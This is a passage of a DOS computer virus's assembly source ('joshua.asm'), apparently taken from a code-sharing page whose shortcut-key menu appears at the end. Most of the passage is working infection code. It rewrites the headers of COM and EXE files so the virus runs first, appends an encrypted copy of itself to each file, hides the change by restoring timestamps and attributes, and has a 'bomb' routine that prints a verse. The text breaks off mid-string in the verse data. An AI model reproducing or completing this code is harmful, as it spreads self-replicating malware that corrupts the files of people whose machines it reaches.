📄 joshua.asm
字号:
; Calculate jump offset for header of victim so it will run virus first.
; AX has the filesize. Store new JMP and OFFSET in the buffer.
mov cx,3 ; No. bytes to write in header
sub ax,cx ; Filesize - jmp_offset
mov byte ptr [si-3],0e9h ; Store new JMP command
mov word ptr [si-2],ax ; plus offset
add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET
push ax ; Save it for later
jmp DONE_INFECTION ; We're done!
;*** Subroutine INFECT_EXE ***
INFECT_EXE:
; Save original CS:IP and SS:SP.
les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP
mov word ptr [bp+JMPSAVE],ax ; Store IP
mov word ptr [bp+JMPSAVE+2],es ; Store CS
les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP
mov word ptr [bp+STACKSAVE],es ; Store SP
mov word ptr [bp+STACKSAVE+2],ax ; Store SS
; Get get the header size in bytes.
mov ax,word ptr [bp+BUFFER+8] ; Get header size
mov cl,4 ; Convert paragraphs to bytes
shl ax,cl ; Multiply by 16
xchg ax,bx ; Put header size in BX
; Get file size.
les ax,[bp+offset DTA+26] ; Get filesize to
mov dx,es ; DX:AX format
push ax ; Save filesize
push dx
sub ax,bx ; Subtract header size
sbb dx,0 ; from filesize
mov cx,16 ; Convert to SEGMENT:OFFSET
div cx ; form
; Store new entry point (CS:IP) in header.
mov word ptr [bp+BUFFER+20],dx; Store IP
mov word ptr [bp+BUFFER+22],ax; Store CS
add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset
mov bx,dx ; Hold it for now
; Store new stack frame (SS:SP) in header.
mov word ptr [bp+BUFFER+14],ax; Store SS
mov word ptr [bp+BUFFER+16],ID; Store SP
pop dx ; Get back filesize
pop ax
add ax,END_VIRUS-START_VIRUS ; Add virus size
adc dx,0 ; to filesize
push ax ; Save AX
mov cl,9 ; Divide AX
shr ax,cl ; by 512
ror dx,cl
stc ; Set carry flag
adc dx,ax ; Add with carry
pop ax ; Get back AX
and ah,1 ; Mod 512
; Store new filesize in header.
mov word ptr [bp+BUFFER+4],dx ; Store new filesize
mov word ptr [bp+BUFFER+2],ax
push cs ; Restore ES
pop es
mov cx,24 ; No. bytes to write in header
push bx ; Save START_VIRUS offset
; Write virus to victim and restore the file's original timestamp, datestamp,
; and attributes. These values were stored in the DTA by the
; Findfirst / Findnext services.
DONE_INFECTION:
push cx ; Save no. bytes to write
xor cx,cx ; Clear attributes
call SET_ATTR ; Set attributes
mov al,2 ; DOS open file for read/write
call OPEN ; Open the file
; Write the new header at the beginning of the file.
mov ah,40h ; DOS write to file
pop cx ; Number of bytes to write
lea dx,[bp+BUFFER] ; Point to the bytes to write
int 21h ; Call DOS to do it
; Move to end of file.
mov ax,4202h ; DOS set read/write pointer
xor cx,cx ; Set offset move to zero
cwd ; Equivalent to xor dx,dx
int 21h ; Call DOS to do it
; Append virus to end of file.
mov ah,2ch ; DOS get time
int 21h ; Call DOS to do it
mov [bp+KEY],dx ; Save sec + 1/100 sec
; as the new KEY
lea di,[bp+APPEND] ; to the heap
mov cx,START_VIRUS-DECRYPT ; Number of bytes to move
mov al,53h ; Push BX and store it
stosb ; in the append routine
lea si,[bp+DECRYPT] ; Move Crypt routines
push si ; Save SI
push cx ; Save CX
rep movsb ; Transfer the data
lea si,[bp+WRITE_START] ; Now copy the write
mov cx,WRITE_END-WRITE_START ; routine to the heap
rep movsb ; Transfer the data
pop cx ; Get back
pop si ; CX and SI
rep movsb ; Recopy Crypt routine
mov ax,0c35bh ; Tack a POP BX and
stosw ; RETN on the end
pop ax ; New START_VIRUS offset
mov word ptr [bp+DECRYPT+1],ax; Store new offset
call APPEND ; Write the file
; Restore original creation date and time.
mov ax,5701h ; DOS set file date & time
mov cx,word ptr [bp+DTA+22] ; Set time
mov dx,word ptr [bp+DTA+24] ; Set date
int 21h ; Call DOS to do it
; Close the file.
mov ah,3eh ; DOS close file
int 21h ; Call DOS to do it
; Restore original file attributes.
mov cx,word ptr [bp+DTA+21] ; Get original file attribute
call SET_ATTR ; Set attribute
pop bx ; Take CALL off stack
; ****** B O M B S E C T I O N ******
; Check to see if the virus is ready to activate.
; Put all activation tests and bombs here.
CONDITIONS: ; mov ah,2ah ; DOS get date
; int 21h ; Call DOS to do it
; cmp dx,1001h ; Check for Oct 1st
; jl BOMB_DONE ; Not time yet
; mov ah,2ch ; DOS get time
; int 21h ; Call DOS to do it
; cmp cl,25h ; Check for 25 min past
; jl BOMB_DONE ; Not time yet
BOMB: mov ah,3h ; BIOS find cursor position
mov bh,0 ; Video page 0
int 10h ; Call BIOS to do it
push dx ; Save original Row and Column
mov cx,6 ; Number of lines to print
lea si,[bp+VERSE] ; Location of VERSE
mov dx,080ah ; Row and Column of output
PRINTLOOP: mov ah,2h ; BIOS set cursor
int 10h ; Set cursor
push dx ; Save Row and Column
mov ah,9h ; DOS print string
mov dx,si ; Location of VERSE
int 21h ; Call DOS to print it
pop dx ; Get Row and Column
inc dh ; Increment Row
add si,54 ; Go to next line of VERSE
loop PRINTLOOP ; Print all lines
mov ah,00h ; Read character from keybd
int 16h
pop dx ; Get original Row Column
mov ah,2h ; BIOS set cursor
int 10h ; Call BIOS to do it
BOMB_DONE: jmp QUIT ; Go back to host program
VERSE: db '帜哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -